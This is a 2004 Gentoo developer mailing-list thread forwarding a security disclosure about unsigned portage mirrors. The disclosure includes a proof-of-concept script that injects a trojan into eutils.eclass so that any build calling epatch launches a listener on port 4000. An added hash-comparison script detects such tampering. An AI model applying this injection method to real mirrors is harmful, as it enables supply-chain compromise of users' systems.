Then perhaps it's time to have a simple mirror that only serves
portage MD5s, for example :)

On Sat, 06 Nov 2004 15:56:32 -0500, Joshua Brindle <method@g.o> wrote:
> perhaps some motivation for portage devs....
>
> -------- Original Message --------
> Subject: [gentoo-security] Trojan for Gentoo, part 2
> Date: Sat, 06 Nov 2004 21:16:11 +0100
> From: Alexander Holler <holler@××××××××××.de>
> To: gentoo-security@l.g.o
>
> Hi,
>
> after 1.5 years (2 years after the bug could be found in bugzilla) it
> seems that one of the highest security risks is closed. At least I've
> seen something about signed ebuilds. (see
> http://marc.theaimsgroup.com/?l=gentoo-security&m=104816199500974&w=2 ).
>
> Time for the next part. I've already written a bug for that a year ago,
> but it was now closed a second time by "the ... gatekeeper".
>
> See bug #26110
>
> Here's the next small script. If you are operating a gentoo mirror, or
> having access to one, feel free to play with it.
>
> If you are a user, the only practical way to ensure a minimum of
> security is to sync twice:
> (a) sync,
> (b) delete timestamp,
> (c) sync with other mirror and
> (d) look if no files were different, otherwise restart with (a)
>
> ----------------gentooTrojan.sh---------------------------
> #!/bin/sh
> if [ ${#} -ne 1 ] ; then
> echo "This script puts a silly trojan into Gentoo's portage."
> echo "Usage: `basename ${0}` PathToPortage"
> exit 1
> fi
>
> mv ${1}/eclass/eutils.eclass ${1}/eclass/eutils-without-trojan.eclass
> sed -e 's:^epatch().*{:epatch() {\newarn "Starting Trojan.\nTry it with
> telnet localhost 4000.\nKill it with killall
> GentooTrojan."\n${PORTDIR}/eclass/GentooTrojan \&\n:'
> <${1}/eclass/eutils-without-trojan.eclass >${1}/eclass/eutils.eclass
> cat >${1}/eclass/GentooTrojan.c << EOF
> #include <unistd.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
> #include <string.h>
>
> int main(void)
> {
> struct sockaddr_in serv;
> struct sockaddr_in cli;
> int sock;
> sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
> if (sock < 0)
> return 1;
> bzero((char *) &serv, sizeof(serv));
> serv.sin_family = AF_INET;
> serv.sin_addr.s_addr = htonl(INADDR_ANY);
> serv.sin_port = htons(4000);
> if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0)
> return 1;
> if (listen(sock, 5) < 0)
> return 1;
> while (1) {
> int scli;
> int slen;
> static char *str="Your are listing to the famous Gentoo trojan!\n";
> slen = sizeof(cli);
> scli = accept(sock, (struct sockaddr *) &cli,
> (socklen_t *) &slen);
> write(scli, str, strlen(str));
> close(scli);
> }
> }
> EOF
>
> gcc -o ${1}/eclass/GentooTrojan ${1}/eclass/GentooTrojan.c
>
> echo "Done. Portage successful infected with a trojan."
> echo "Just emerge an ebuild which uses epatch and do a"
> echo " telnet localhost 4000"
> echo "afterwards."
> -------------------------------------------
>
> Kind regards,
>
> Alexander Holler
>
> PS: Please don't reply to me, I don't read any Gentoo mailing lists
> anymore, in fact I even don't know why I'm writing this message, as I
> already have lost every interest in Gentoo some time ago.
>
> PPS: Sorry for that hard words, but that all reminds me on Microsoft.
> The "eclass-hell" is as bad as the "dll-hell" and some bugs are getting
> forgotten, ignored or fixed in the same time.
>
> PPPS: I really appreciate all the very good work on hardened gcc,
> selinux-profiles and so on, but for me, this all seems useless as long
> as the base is compromised that easy and the user has no practical way
> (e.g. hashes) to check what he gets on his machine with a 'sync'.
>
> --
> gentoo-security@g.o mailing list
>
> --
> gentoo-dev@g.o mailing list
>

--
Ioannis Aslanidis
<deathwing00[at]forums.gentoo.org> 0xC2539DA3
<aioannis[at]tinet.org> 0xF202D067
<dwcommander[at]users.sourceforge.net>

Hellenic Gentoo GNU/Linux project manager (http://hellenicgentoo.sf.net)
FIRECOPS++ project manager (http://firecops.sf.net)
Gentoo Forums Global Moderator (http://forums.gentoo.org)

Computer Engineering student at Universitat Rovira i Virgili

--
gentoo-dev@g.o mailing list
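
The sync-twice check in the quoted message, steps (a) to (d), comes down to comparing two copies of the tree fetched from different mirrors. The script below is an added example, not part of the original thread: it hashes both copies with sha256sum and lists files that are changed or present on one side only. The IGNORE pattern for per-mirror timestamp files, the function names and the sample trees are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original thread): compare two copies of a
# portage tree, each synced from a different mirror, by SHA-256 hash.

# Assumption: per-mirror timestamp files sit under metadata/ and differ
# legitimately between mirrors, so they are left out of the comparison.
IGNORE='./metadata/timestamp*'

# manifest DIR: print "<sha256>  ./relative/path" for every regular file.
manifest() {
    ( cd "$1" && find . -type f ! -path "$IGNORE" -exec sha256sum {} + )
}

# compare_trees A B: list files that differ between the two copies.
# Returns 0 when the copies match, 1 when anything differs.
compare_trees() {
    ma=$(mktemp) && mb=$(mktemp) || return 2
    manifest "$1" >"$ma"
    manifest "$2" >"$mb"
    rc=0
    awk '
        { hash = $1; path = substr($0, length($1) + 3) }
        FILENAME == ARGV[1] { first[path] = hash; next }
        !(path in first)    { print "ONLY_IN_B " path; bad = 1; next }
                            { seen[path] = 1 }
        first[path] != hash { print "CHANGED   " path; bad = 1 }
        END {
            for (path in first)
                if (!(path in seen)) { print "ONLY_IN_A " path; bad = 1 }
            exit bad + 0
        }' "$ma" "$mb" || rc=$?
    rm -f "$ma" "$mb"
    return "$rc"
}

# sample_trees DIR: build constructed trees DIR/a and DIR/b; b has one
# eclass changed and one file added, and only the timestamps differ otherwise.
sample_trees() {
    mkdir -p "$1/a/eclass" "$1/a/metadata" "$1/b/eclass" "$1/b/metadata"
    echo 'epatch() { :; }'        >"$1/a/eclass/eutils.eclass"
    echo 'epatch() { extra; :; }' >"$1/b/eclass/eutils.eclass"
    echo 'inherit eutils'         >"$1/a/eclass/other.eclass"
    cp "$1/a/eclass/other.eclass"  "$1/b/eclass/other.eclass"
    echo 'unexpected'             >"$1/b/eclass/added-file"
    echo 'mirror A time'          >"$1/a/metadata/timestamp.chk"
    echo 'mirror B time'          >"$1/b/metadata/timestamp.chk"
}

# Usage: sh compare.sh TREE_A TREE_B
if [ "$#" -eq 2 ]; then compare_trees "$1" "$2"; fi
```

A clean result only shows that the two mirrors agree with each other; it does not tell you anything if both carry the same modification.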